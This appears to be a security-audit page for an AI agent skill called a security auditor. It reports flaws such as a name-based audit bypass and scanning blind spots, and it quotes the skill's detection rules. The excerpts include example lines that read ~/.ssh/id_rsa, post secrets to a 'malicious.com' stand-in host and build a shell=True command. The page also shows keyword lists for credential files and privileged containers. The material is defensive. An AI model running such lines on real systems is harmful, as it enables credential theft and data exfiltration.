Back to skill

Security audit

Klemenska Security Auditor

Security checks for vulnerabilities and agentic risk

Overview

This skill is a disclosed security-auditing tool, but its own scanner can skip or miss important skill content and may give users misleading low-risk results.

Install only if you treat this as a lightweight helper, not a source of truth. Its reports can miss malicious instructions or payloads and can falsely mark same-named skills as low risk; run it in a constrained workspace and verify important results with another review process.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (3)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/audit.py:95
Finding

Name-Based Audit Bypass Produces False LOW-Risk Results

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Error
Location
scripts/audit.py:132
Finding

Restricted File-Type Scanning Misses Skill Instructions and Unsupported Payloads

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Error
Location
scripts/scan_skill.py:111
Finding

Attacker-Controlled Filenames Suppress Unsafe Code Findings

Content
View full analysis
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (9)

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · references/rules.md (reported line 73)May include surrounding context.

Credential Access

python
# CRITICAL - Credential harvesting
with open(os.path.expanduser("~/.ssh/id_rsa")) as f:
    key = f.read()
python

Tool Parameter Abuse

High
Category
Tool Misuse
Confidence
80% confidence
Finding

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Content

Scanner excerpt · references/rules.md (reported line 88)May include surrounding context.

text
```python
# HIGH - Shell injection
subprocess.run(f"ls {directory}", shell=True)
python
# MEDIUM - Dynamic code

Credential Access

High
Category
Privilege Escalation
Confidence
60% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · scripts/audit.py (reported line 29)May include surrounding context.

python
("password", "Password file access"),
        ("secret", "Secret file access"),
        ("credentials", "Credentials access"),
        (".env", "Environment file access"),
    ],
    "network": [
        ("eval(", "Dynamic code execution"),

Privileged Container / Container Escape

High
Category
Privilege Escalation
Confidence
80% confidence
Finding

Potential security issue detected. Manual review is recommended.

Content

Scanner excerpt · scripts/audit.py (reported line 36)May include surrounding context.

python
("exec(", "Shell execution"),
    ],
    "permissions": [
        ("--privileged", "Privileged mode"),
        ("--cap-all", "All capabilities"),
        ("security=insecure", "Insecure security mode"),
        ("elevated=true", "Elevated permissions"),

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
90% confidence
Finding

The skill documentation instructs use of shell commands and indicates file read/write behavior via generated reports, but the manifest declares no explicit tool scope such as permissions or allowed-tools. This creates a mismatch between declared capabilities and actual expected behavior, which weakens least-privilege controls and can cause the skill to be run with broader or implicit access than reviewers anticipated.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
60% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · references/rules.md (reported line 98)May include surrounding context.

Data Exfiltration

python
# HIGH - Suspicious outbound
requests.post("https://malicious.com", data=secrets)

Obfuscation

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

The script explicitly exempts the security-auditor skill from auditing, which creates a blind spot in the very tool meant to assess installed skills. An attacker or careless maintainer could hide risky behavior in this skill and it would never be surfaced by normal scans, undermining trust in audit results.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

Path(args.output).write_text(report) writes to any path supplied by the user without validation, confirmation, or safe-directory restrictions. In agent or automated contexts, a manipulated output path could overwrite arbitrary user files, clobber configuration, or place content in sensitive locations.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Low
Category
Not specified by scanner
Confidence
79% confidence
Finding

The manifest describes scanning and auditing skills for security risks, suspicious patterns, and permission overreach, but the code also exposes a separate --compare mode that compares two skills' risk results. That comparison feature is not reflected in the manifest description, so the implemented behavior exceeds the stated scope of the skill's purpose.

Content

No source excerpt is available for this finding.

Static analysis

Detected: suspicious.dynamic_code_execution

Dynamic code execution detected.

Critical
Code
suspicious.dynamic_code_execution
Location
scripts/audit.py:32

Dynamic code execution detected.

Critical
Code
suspicious.dynamic_code_execution
Location
scripts/scan_skill.py:95